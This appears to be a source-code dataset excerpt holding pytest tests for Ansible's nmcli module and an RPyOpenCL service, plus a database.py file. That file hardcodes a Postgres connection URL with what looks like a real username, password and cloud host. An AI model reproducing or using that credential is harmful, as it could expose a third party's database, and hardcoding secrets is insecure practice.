assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_ETHERNET_STATIC, indirect=['patch_ansible_module'])
def test_modify_ethernet_dhcp_to_static(mocked_ethernet_connection_dhcp_to_static, capfd):
"""
Test : Modify ethernet connection from DHCP to static
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 2
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[1]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'modify'
assert args[0][3] == 'non_existent_nw_device'
for param in ['ipv4.method', 'ipv4.gateway', 'ipv4.addresses']:
assert param in args[0]
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_ETHERNET_STATIC, indirect=['patch_ansible_module'])
def test_create_ethernet_static(mocked_generic_connection_create, capfd):
"""
Test : Create ethernet connection with static IP configuration
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 2
arg_list = nmcli.Nmcli.execute_command.call_args_list
add_args, add_kw = arg_list[0]
assert add_args[0][0] == '/usr/bin/nmcli'
assert add_args[0][1] == 'con'
assert add_args[0][2] == 'add'
assert add_args[0][3] == 'type'
assert add_args[0][4] == 'ethernet'
assert add_args[0][5] == 'con-name'
assert add_args[0][6] == 'non_existent_nw_device'
add_args_text = list(map(to_text, add_args[0]))
for param in ['connection.interface-name', 'ethernet_non_existant',
'ipv4.addresses', '10.10.10.10/24',
'ipv4.gateway', '10.10.10.1',
'ipv4.dns', '1.1.1.1,8.8.8.8']:
assert param in add_args_text
up_args, up_kw = arg_list[1]
assert up_args[0][0] == '/usr/bin/nmcli'
assert up_args[0][1] == 'con'
assert up_args[0][2] == 'up'
assert up_args[0][3] == 'non_existent_nw_device'
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_ETHERNET_STATIC, indirect=['patch_ansible_module'])
def test_ethernet_connection_static_unchanged(mocked_ethernet_connection_static_unchanged, capfd):
"""
Test : Ethernet connection with static IP configuration unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_WIRELESS, indirect=['patch_ansible_module'])
def test_create_wireless(mocked_wireless_create, capfd):
"""
Test : Create wireless connection
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 2
arg_list = nmcli.Nmcli.execute_command.call_args_list
get_available_options_args, get_available_options_kw = arg_list[0]
assert get_available_options_args[0][0] == '/usr/bin/nmcli'
assert get_available_options_args[0][1] == 'con'
assert get_available_options_args[0][2] == 'edit'
assert get_available_options_args[0][3] == 'type'
assert get_available_options_args[0][4] == 'wifi'
get_available_options_data = get_available_options_kw['data'].split()
for param in ['print', '802-11-wireless',
'quit', 'yes']:
assert param in get_available_options_data
add_args, add_kw = arg_list[1]
assert add_args[0][0] == '/usr/bin/nmcli'
assert add_args[0][1] == 'con'
assert add_args[0][2] == 'add'
assert add_args[0][3] == 'type'
assert add_args[0][4] == 'wifi'
assert add_args[0][5] == 'con-name'
assert add_args[0][6] == 'non_existent_nw_device'
add_args_text = list(map(to_text, add_args[0]))
for param in ['connection.interface-name', 'wireless_non_existant',
'ipv4.addresses', '10.10.10.10/24',
'802-11-wireless.ssid', 'Brittany',
'802-11-wireless.mode', 'ap',
'802-11-wireless.hidden', 'yes']:
assert param in add_args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_SECURE_WIRELESS, indirect=['patch_ansible_module'])
def test_create_secure_wireless(mocked_secure_wireless_create, capfd):
"""
Test : Create secure wireless connection
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 3
arg_list = nmcli.Nmcli.execute_command.call_args_list
get_available_options_args, get_available_options_kw = arg_list[0]
assert get_available_options_args[0][0] == '/usr/bin/nmcli'
assert get_available_options_args[0][1] == 'con'
assert get_available_options_args[0][2] == 'edit'
assert get_available_options_args[0][3] == 'type'
assert get_available_options_args[0][4] == 'wifi'
get_available_options_data = get_available_options_kw['data'].split()
for param in ['print', '802-11-wireless-security',
'quit', 'yes']:
assert param in get_available_options_data
add_args, add_kw = arg_list[1]
assert add_args[0][0] == '/usr/bin/nmcli'
assert add_args[0][1] == 'con'
assert add_args[0][2] == 'add'
assert add_args[0][3] == 'type'
assert add_args[0][4] == 'wifi'
assert add_args[0][5] == 'con-name'
assert add_args[0][6] == 'non_existent_nw_device'
add_args_text = list(map(to_text, add_args[0]))
for param in ['connection.interface-name', 'wireless_non_existant',
'ipv4.addresses', '10.10.10.10/24',
'802-11-wireless.ssid', 'Brittany',
'802-11-wireless-security.key-mgmt', 'wpa-psk']:
assert param in add_args_text
edit_args, edit_kw = arg_list[2]
assert edit_args[0][0] == '/usr/bin/nmcli'
assert edit_args[0][1] == 'con'
assert edit_args[0][2] == 'edit'
assert edit_args[0][3] == 'non_existent_nw_device'
edit_kw_data = edit_kw['data'].split()
for param in ['802-11-wireless-security.psk', 'VERY_SECURE_PASSWORD',
'save',
'quit']:
assert param in edit_kw_data
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_SECURE_WIRELESS, indirect=['patch_ansible_module'])
def test_create_secure_wireless_failure(mocked_secure_wireless_create_failure, capfd):
"""
Test : Create secure wireless connection w/failure
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 2
arg_list = nmcli.Nmcli.execute_command.call_args_list
get_available_options_args, get_available_options_kw = arg_list[0]
assert get_available_options_args[0][0] == '/usr/bin/nmcli'
assert get_available_options_args[0][1] == 'con'
assert get_available_options_args[0][2] == 'edit'
assert get_available_options_args[0][3] == 'type'
assert get_available_options_args[0][4] == 'wifi'
get_available_options_data = get_available_options_kw['data'].split()
for param in ['print', '802-11-wireless-security',
'quit', 'yes']:
assert param in get_available_options_data
add_args, add_kw = arg_list[1]
assert add_args[0][0] == '/usr/bin/nmcli'
assert add_args[0][1] == 'con'
assert add_args[0][2] == 'add'
assert add_args[0][3] == 'type'
assert add_args[0][4] == 'wifi'
assert add_args[0][5] == 'con-name'
assert add_args[0][6] == 'non_existent_nw_device'
add_args_text = list(map(to_text, add_args[0]))
for param in ['connection.interface-name', 'wireless_non_existant',
'ipv4.addresses', '10.10.10.10/24',
'802-11-wireless.ssid', 'Brittany',
'802-11-wireless-security.key-mgmt', 'wpa-psk']:
assert param in add_args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert results.get('failed')
assert 'changed' not in results
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_SECURE_WIRELESS, indirect=['patch_ansible_module'])
def test_modify_secure_wireless(mocked_secure_wireless_modify, capfd):
"""
Test : Modify secure wireless connection
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 4
arg_list = nmcli.Nmcli.execute_command.call_args_list
get_available_options_args, get_available_options_kw = arg_list[0]
assert get_available_options_args[0][0] == '/usr/bin/nmcli'
assert get_available_options_args[0][1] == 'con'
assert get_available_options_args[0][2] == 'edit'
assert get_available_options_args[0][3] == 'type'
assert get_available_options_args[0][4] == 'wifi'
get_available_options_data = get_available_options_kw['data'].split()
for param in ['print', '802-11-wireless-security',
'quit', 'yes']:
assert param in get_available_options_data
show_args, show_kw = arg_list[1]
assert show_args[0][0] == '/usr/bin/nmcli'
assert show_args[0][1] == '--show-secrets'
assert show_args[0][2] == 'con'
assert show_args[0][3] == 'show'
assert show_args[0][4] == 'non_existent_nw_device'
add_args, add_kw = arg_list[2]
assert add_args[0][0] == '/usr/bin/nmcli'
assert add_args[0][1] == 'con'
assert add_args[0][2] == 'modify'
assert add_args[0][3] == 'non_existent_nw_device'
add_args_text = list(map(to_text, add_args[0]))
for param in ['connection.interface-name', 'wireless_non_existant',
'ipv4.addresses', '10.10.10.10/24',
'802-11-wireless.ssid', 'Brittany',
'802-11-wireless-security.key-mgmt', 'wpa-psk']:
assert param in add_args_text
edit_args, edit_kw = arg_list[3]
assert edit_args[0][0] == '/usr/bin/nmcli'
assert edit_args[0][1] == 'con'
assert edit_args[0][2] == 'edit'
assert edit_args[0][3] == 'non_existent_nw_device'
edit_kw_data = edit_kw['data'].split()
for param in ['802-11-wireless-security.psk', 'VERY_SECURE_PASSWORD',
'save',
'quit']:
assert param in edit_kw_data
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_SECURE_WIRELESS, indirect=['patch_ansible_module'])
def test_modify_secure_wireless_failure(mocked_secure_wireless_modify_failure, capfd):
"""
Test : Modify secure wireless connection w/failure
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 3
arg_list = nmcli.Nmcli.execute_command.call_args_list
get_available_options_args, get_available_options_kw = arg_list[0]
assert get_available_options_args[0][0] == '/usr/bin/nmcli'
assert get_available_options_args[0][1] == 'con'
assert get_available_options_args[0][2] == 'edit'
assert get_available_options_args[0][3] == 'type'
assert get_available_options_args[0][4] == 'wifi'
get_available_options_data = get_available_options_kw['data'].split()
for param in ['print', '802-11-wireless-security',
'quit', 'yes']:
assert param in get_available_options_data
show_args, show_kw = arg_list[1]
assert show_args[0][0] == '/usr/bin/nmcli'
assert show_args[0][1] == '--show-secrets'
assert show_args[0][2] == 'con'
assert show_args[0][3] == 'show'
assert show_args[0][4] == 'non_existent_nw_device'
add_args, add_kw = arg_list[2]
assert add_args[0][0] == '/usr/bin/nmcli'
assert add_args[0][1] == 'con'
assert add_args[0][2] == 'modify'
assert add_args[0][3] == 'non_existent_nw_device'
add_args_text = list(map(to_text, add_args[0]))
for param in ['connection.interface-name', 'wireless_non_existant',
'ipv4.addresses', '10.10.10.10/24',
'802-11-wireless.ssid', 'Brittany',
'802-11-wireless-security.key-mgmt', 'wpa-psk']:
assert param in add_args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert results.get('failed')
assert 'changed' not in results
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_DUMMY_STATIC, indirect=['patch_ansible_module'])
def test_create_dummy_static(mocked_generic_connection_create, capfd):
"""
Test : Create dummy connection with static IP configuration
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 2
arg_list = nmcli.Nmcli.execute_command.call_args_list
add_args, add_kw = arg_list[0]
assert add_args[0][0] == '/usr/bin/nmcli'
assert add_args[0][1] == 'con'
assert add_args[0][2] == 'add'
assert add_args[0][3] == 'type'
assert add_args[0][4] == 'dummy'
assert add_args[0][5] == 'con-name'
assert add_args[0][6] == 'non_existent_nw_device'
add_args_text = list(map(to_text, add_args[0]))
for param in ['connection.interface-name', 'dummy_non_existant',
'ipv4.addresses', '10.10.10.10/24',
'ipv4.gateway', '10.10.10.1',
'ipv4.dns', '1.1.1.1,8.8.8.8',
'ipv6.addresses', '2001:db8::1/128']:
assert param in add_args_text
up_args, up_kw = arg_list[1]
assert up_args[0][0] == '/usr/bin/nmcli'
assert up_args[0][1] == 'con'
assert up_args[0][2] == 'up'
assert up_args[0][3] == 'non_existent_nw_device'
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_DUMMY_STATIC, indirect=['patch_ansible_module'])
def test_dummy_connection_static_unchanged(mocked_dummy_connection_static_unchanged, capfd):
"""
Test : Dummy connection with static IP configuration unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_DUMMY_STATIC, indirect=['patch_ansible_module'])
def test_dummy_connection_static_without_mtu_unchanged(mocked_dummy_connection_static_without_mtu_unchanged, capfd):
"""
Test : Dummy connection with static IP configuration and no mtu set unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_DUMMY_STATIC, indirect=['patch_ansible_module'])
def test_dummy_connection_static_with_custom_mtu_modify(mocked_dummy_connection_static_with_custom_mtu_modify, capfd):
"""
Test : Dummy connection with static IP configuration and no mtu set modify
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 2
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[1]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'modify'
assert args[0][3] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['802-3-ethernet.mtu', '0']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GSM, indirect=['patch_ansible_module'])
def test_create_gsm(mocked_generic_connection_create, capfd):
"""
Test if gsm created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'gsm'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['connection.interface-name', 'gsm_non_existant',
'gsm.apn', 'internet.telekom',
'gsm.username', 't-mobile',
'gsm.password', 'tm',
'gsm.pin', '1234']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GSM, indirect=['patch_ansible_module'])
def test_gsm_mod(mocked_generic_connection_modify, capfd):
"""
Test if gsm modified
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'modify'
assert args[0][3] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['gsm.username', 't-mobile',
'gsm.password', 'tm']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GSM, indirect=['patch_ansible_module'])
def test_gsm_connection_unchanged(mocked_gsm_connection_unchanged, capfd):
"""
Test if gsm connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
| 33.40458 | 141 | 0.616461 | 10,180 | 83,144 | 4.795776 | 0.033792 | 0.026628 | 0.02884 | 0.034248 | 0.921735 | 0.895066 | 0.869667 | 0.834682 | 0.788882 | 0.778702 | 0 | 0.037943 | 0.257313 | 83,144 | 2,488 | 142 | 33.418006 | 0.75268 | 0.027603 | 0 | 0.742464 | 0 | 0.001058 | 0.361767 | 0.097953 | 0 | 0 | 0.000075 | 0 | 0.220518 | 1 | 0.047065 | false | 0.005288 | 0.002644 | 0 | 0.049709 | 0.003173 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c784fd03045a55169772c4616ac2379ad7bbb602 | 13,197 | py | Python | tests/test_preferred_vector_size.py | shazz/DistributedOpenCL | ddfac3ea1be84b13539e7ac07f3ef7811bbd81b6 | [
"MIT"
] | 1 | 2021-12-07T08:56:44.000Z | 2021-12-07T08:56:44.000Z | tests/test_preferred_vector_size.py | shazz/DistributedOpenCL | ddfac3ea1be84b13539e7ac07f3ef7811bbd81b6 | [
"MIT"
] | null | null | null | tests/test_preferred_vector_size.py | shazz/DistributedOpenCL | ddfac3ea1be84b13539e7ac07f3ef7811bbd81b6 | [
"MIT"
] | null | null | null | import pytest
import sys
import os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../node')))
from rpyopencl import RPyOpenCLCluster
import numpy as np
from unittest import TestCase
from rpyc.utils.server import OneShotServer
from rpyopencl_service import RPyOpenCLService
kernel_template = """
__kernel void sum_mul(
__global const float<VECSIZE> *a_g, __global const float<VECSIZE> *b_g,
__global float<VECSIZE> *res_add, __global float<VECSIZE> *res_mul)
{
int gid = get_global_id(0);
res_add[gid] = a_g[gid] + b_g[gid];
res_mul[gid] = a_g[gid] * b_g[gid];
}
"""
kernel_no_template = """
__kernel void sum_mul(
__global const float *a_g, __global const float *b_g,
__global float *res_add, __global float *res_mul)
{
int gid = get_global_id(0);
res_add[gid] = a_g[gid] + b_g[gid];
res_mul[gid] = a_g[gid] * b_g[gid];
}
"""
kernel_no_template_optimized = """
__kernel void sum_mul(
__global const float4 *a_g, __global const float4 *b_g,
__global float4 *res_add, __global float4 *res_mul)
{
int gid = get_global_id(0);
res_add[gid] = a_g[gid] + b_g[gid];
res_mul[gid] = a_g[gid] * b_g[gid];
}
"""
class CommonTest(TestCase):
def setUp(self):
RPYC_CFG = {"allow_all_attrs": True, "allow_pickle": True, "allow_public_attrs": True}
self.server = OneShotServer(RPyOpenCLService, port=18861, auto_register=False, protocol_config=RPYC_CFG)
self.server.logger.quiet = False
self.server._start_in_thread()
print("OneShotServer started!")
nodes = [ {"name": "pytest", "ip": "localhost"} ]
cluster = RPyOpenCLCluster(nodes, use_async=False)
self.node = cluster.get_node("pytest")
print("Opencl node ready!")
def tearDown(self):
self.server.close()
class TestNoUseWithoutTemplate(CommonTest):
@pytest.fixture(autouse=True)
def setup_opencl(self):
self.object_type = np.float32
self.size = 16
self.kernel_name = "sum_mul"
self.a_np = np.random.rand(self.size).astype(self.object_type)
self.b_np = np.random.rand(self.size).astype(self.object_type)
self.kernel = kernel_no_template
def test_preferred_vector_size(self):
self.node.create_context()
self.node.add_command_queue()
self.node.compile_kernel(self.kernel, use_prefered_vector_size=None)
self.node.create_input_buffer(self.a_np)
self.node.create_input_buffer(self.b_np)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
res_array = np.array(self.node.execute_kernel(self.kernel_name, (self.size,), True))
print("Difference:", res_array[0] - (self.a_np + self.b_np))
assert np.allclose(res_array[0], self.a_np + self.b_np)
assert np.allclose(res_array[1], self.a_np * self.b_np)
class TestNoUseWithTemplate(CommonTest):
@pytest.fixture(autouse=True)
def setup_opencl(self):
self.object_type = np.float32
self.size = 16
self.kernel_name = "sum_mul"
self.a_np = np.random.rand(self.size).astype(self.object_type)
self.b_np = np.random.rand(self.size).astype(self.object_type)
self.kernel = kernel_template
def test_preferred_vector_size(self):
self.node.create_context()
self.node.add_command_queue()
self.node.compile_kernel(self.kernel, use_prefered_vector_size=None)
self.node.create_input_buffer(self.a_np)
self.node.create_input_buffer(self.b_np)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
res_array = np.array(self.node.execute_kernel(self.kernel_name, (self.size,), True))
print("Difference:", res_array[0] - (self.a_np + self.b_np))
assert np.allclose(res_array[0], self.a_np + self.b_np)
assert np.allclose(res_array[1], self.a_np * self.b_np)
class TestNoUseWithoutTemplateNoDivisible(CommonTest):
@pytest.fixture(autouse=True)
def setup_opencl(self):
self.object_type = np.float32
self.size = 17
self.kernel_name = "sum_mul"
self.a_np = np.random.rand(self.size).astype(self.object_type)
self.b_np = np.random.rand(self.size).astype(self.object_type)
self.kernel = kernel_no_template
def test_preferred_vector_size(self):
self.node.create_context()
self.node.add_command_queue()
self.node.compile_kernel(self.kernel, use_prefered_vector_size=None)
self.node.create_input_buffer(self.a_np)
self.node.create_input_buffer(self.b_np)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
# with pytest.raises(RuntimeError):
res_array = np.array(self.node.execute_kernel(self.kernel_name, (self.size,), True))
print("Difference:", res_array[0] - (self.a_np + self.b_np))
assert np.allclose(res_array[0], self.a_np + self.b_np)
assert np.allclose(res_array[1], self.a_np * self.b_np)
class TestNoUseWithTemplateNoDivisible(CommonTest):
@pytest.fixture(autouse=True)
def setup_opencl(self):
self.object_type = np.float32
self.size = 17
self.kernel_name = "sum_mul"
self.a_np = np.random.rand(self.size).astype(self.object_type)
self.b_np = np.random.rand(self.size).astype(self.object_type)
self.kernel = kernel_template
def test_preferred_vector_size(self):
self.node.create_context()
self.node.add_command_queue()
self.node.compile_kernel(self.kernel, use_prefered_vector_size=None)
self.node.create_input_buffer(self.a_np)
self.node.create_input_buffer(self.b_np)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
# with pytest.raises(RuntimeError):
res_array = np.array(self.node.execute_kernel(self.kernel_name, (self.size,), True))
print("Difference:", res_array[0] - (self.a_np + self.b_np))
assert np.allclose(res_array[0], self.a_np + self.b_np)
assert np.allclose(res_array[1], self.a_np * self.b_np)
class TestUseWithTemplateNoDivisible(CommonTest):
@pytest.fixture(autouse=True)
def setup_opencl(self):
self.object_type = np.float32
self.size = 17
self.kernel_name = "sum_mul"
self.a_np = np.random.rand(self.size).astype(self.object_type)
self.b_np = np.random.rand(self.size).astype(self.object_type)
self.kernel = kernel_template
def test_preferred_vector_size(self):
self.node.create_context()
self.node.add_command_queue()
self.node.compile_kernel(self.kernel, use_prefered_vector_size="float")
self.node.create_input_buffer(self.a_np)
self.node.create_input_buffer(self.b_np)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
with pytest.raises(RuntimeError):
res_array = np.array(self.node.execute_kernel(self.kernel_name, (self.size,), True))
print("Difference:", res_array[0] - (self.a_np + self.b_np))
assert np.allclose(res_array[0], self.a_np + self.b_np)
assert np.allclose(res_array[1], self.a_np * self.b_np)
class TestUseWithoutTemplateNoDivisible(CommonTest):
@pytest.fixture(autouse=True)
def setup_opencl(self):
self.object_type = np.float32
self.size = 17
self.kernel_name = "sum_mul"
self.a_np = np.random.rand(self.size).astype(self.object_type)
self.b_np = np.random.rand(self.size).astype(self.object_type)
self.kernel = kernel_template
def test_preferred_vector_size(self):
self.node.create_context()
self.node.add_command_queue()
self.node.compile_kernel(self.kernel, use_prefered_vector_size="float")
self.node.create_input_buffer(self.a_np)
self.node.create_input_buffer(self.b_np)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
with pytest.raises(RuntimeError):
res_array = np.array(self.node.execute_kernel(self.kernel_name, (self.size,), True))
print("Difference:", res_array[0] - (self.a_np + self.b_np))
assert np.allclose(res_array[0], self.a_np + self.b_np)
assert np.allclose(res_array[1], self.a_np * self.b_np)
class TestUseOptimizedNoDivisible(CommonTest):
# WARNING!!!! This test will not pass even as the result is wrong! kernel conception issue!
# There is no easy way to spot this conception issue unless checking the kernel input type
@pytest.fixture(autouse=True)
def setup_opencl(self):
self.object_type = np.float32
self.size = 17
self.kernel_name = "sum_mul"
self.a_np = np.random.rand(self.size).astype(self.object_type)
self.b_np = np.random.rand(self.size).astype(self.object_type)
self.kernel = kernel_no_template_optimized
def test_preferred_vector_size(self):
self.node.create_context()
self.node.add_command_queue()
self.node.compile_kernel(self.kernel, use_prefered_vector_size="float")
self.node.create_input_buffer(self.a_np)
self.node.create_input_buffer(self.b_np)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
res_array = np.array(self.node.execute_kernel(self.kernel_name, (self.size // 4,), True))
print("Difference:", res_array[0] - (self.a_np + self.b_np))
assert not np.allclose(res_array[0], self.a_np + self.b_np)
assert not np.allclose(res_array[1], self.a_np * self.b_np)
class TestNoUseOptimized(CommonTest):
@pytest.fixture(autouse=True)
def setup_opencl_node_optimized(self):
self.object_type = np.float32
self.size = 16
self.kernel_name = "sum_mul"
self.a_np = np.random.rand(self.size).astype(self.object_type)
self.b_np = np.random.rand(self.size).astype(self.object_type)
self.kernel = kernel_no_template_optimized
def test_preferred_vector_size(self):
self.node.create_context()
self.node.add_command_queue()
self.node.compile_kernel(self.kernel, use_prefered_vector_size=None)
self.node.create_input_buffer(self.a_np)
self.node.create_input_buffer(self.b_np)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
res_array = np.array(self.node.execute_kernel(self.kernel_name, (self.size // 4,), True))
print("Difference:", res_array[0] - (self.a_np + self.b_np))
assert np.allclose(res_array[0], self.a_np + self.b_np)
assert np.allclose(res_array[1], self.a_np * self.b_np)
class TestNoUseOptimizedNoDivide(CommonTest):
# WARNING!!!! This test will not pass even as the result is wrong! kernel conception issue!
# There is no easy way to spot this conception issue unless checking the kernel input type
@pytest.fixture(autouse=True)
def setup_opencl(self):
self.object_type = np.float32
self.size = 17
self.kernel_name = "sum_mul"
self.a_np = np.random.rand(self.size).astype(self.object_type)
self.b_np = np.random.rand(self.size).astype(self.object_type)
self.kernel = kernel_no_template_optimized
def test_preferred_vector_size(self):
self.node.create_context()
self.node.add_command_queue()
self.node.compile_kernel(self.kernel, use_prefered_vector_size=None)
self.node.create_input_buffer(self.a_np)
self.node.create_input_buffer(self.b_np)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
self.node.create_output_buffer(object_type=self.object_type, object_shape=self.a_np.shape)
res_array = np.array(self.node.execute_kernel(self.kernel_name, (self.size // 4,), True))
print("Difference:", res_array[0] - (self.a_np + self.b_np))
assert not np.allclose(res_array[0], self.a_np + self.b_np)
assert not np.allclose(res_array[1], self.a_np * self.b_np)
| 40.112462 | 112 | 0.695764 | 1,951 | 13,197 | 4.42491 | 0.075346 | 0.067647 | 0.051083 | 0.045871 | 0.882775 | 0.878605 | 0.875478 | 0.875478 | 0.861578 | 0.861578 | 0 | 0.007451 | 0.186406 | 13,197 | 328 | 113 | 40.234756 | 0.796591 | 0.032204 | 0 | 0.803279 | 0 | 0 | 0.084613 | 0 | 0 | 0 | 0 | 0 | 0.07377 | 1 | 0.081967 | false | 0 | 0.032787 | 0 | 0.155738 | 0.045082 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c7a8dcff3368f251cff547db9eefc9ea8bd93de0 | 252 | py | Python | lib/database.py | trianggadios/sisbar | cc4516e93010d28795113d8289c9908bdf1f397c | [
"MIT"
] | null | null | null | lib/database.py | trianggadios/sisbar | cc4516e93010d28795113d8289c9908bdf1f397c | [
"MIT"
] | null | null | null | lib/database.py | trianggadios/sisbar | cc4516e93010d28795113d8289c9908bdf1f397c | [
"MIT"
] | null | null | null | import psycopg2
def db_connect():
conn = psycopg2.connect('postgres://gvnatsrdmpuiei:71bebeda59e3ed2169f820951cdeb99f54ce2494994aa384c551154b60fb525f@ec2-52-0-114-209.compute-1.amazonaws.com:5432/d4qbnkep1ksgfa', sslmode='require')
return conn | 50.4 | 201 | 0.81746 | 26 | 252 | 7.884615 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.252137 | 0.071429 | 252 | 5 | 202 | 50.4 | 0.623932 | 0 | 0 | 0 | 0 | 0.25 | 0.624506 | 0.596838 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
c7dff1ab8a2772260d9e5137bf17e88405aab99f | 167 | py | Python | frequencia/vinculos/admin.py | andersonqueiroz/frequencia | 7dae9bb6115759edb8e8297565d0dd1b638ac94a | [
"MIT"
] | 1 | 2021-11-22T17:17:03.000Z | 2021-11-22T17:17:03.000Z | frequencia/vinculos/admin.py | andersonqueiroz/frequencia | 7dae9bb6115759edb8e8297565d0dd1b638ac94a | [
"MIT"
] | 11 | 2019-06-18T11:19:23.000Z | 2021-08-23T12:04:54.000Z | frequencia/vinculos/admin.py | andersonqueiroz/frequencia | 7dae9bb6115759edb8e8297565d0dd1b638ac94a | [
"MIT"
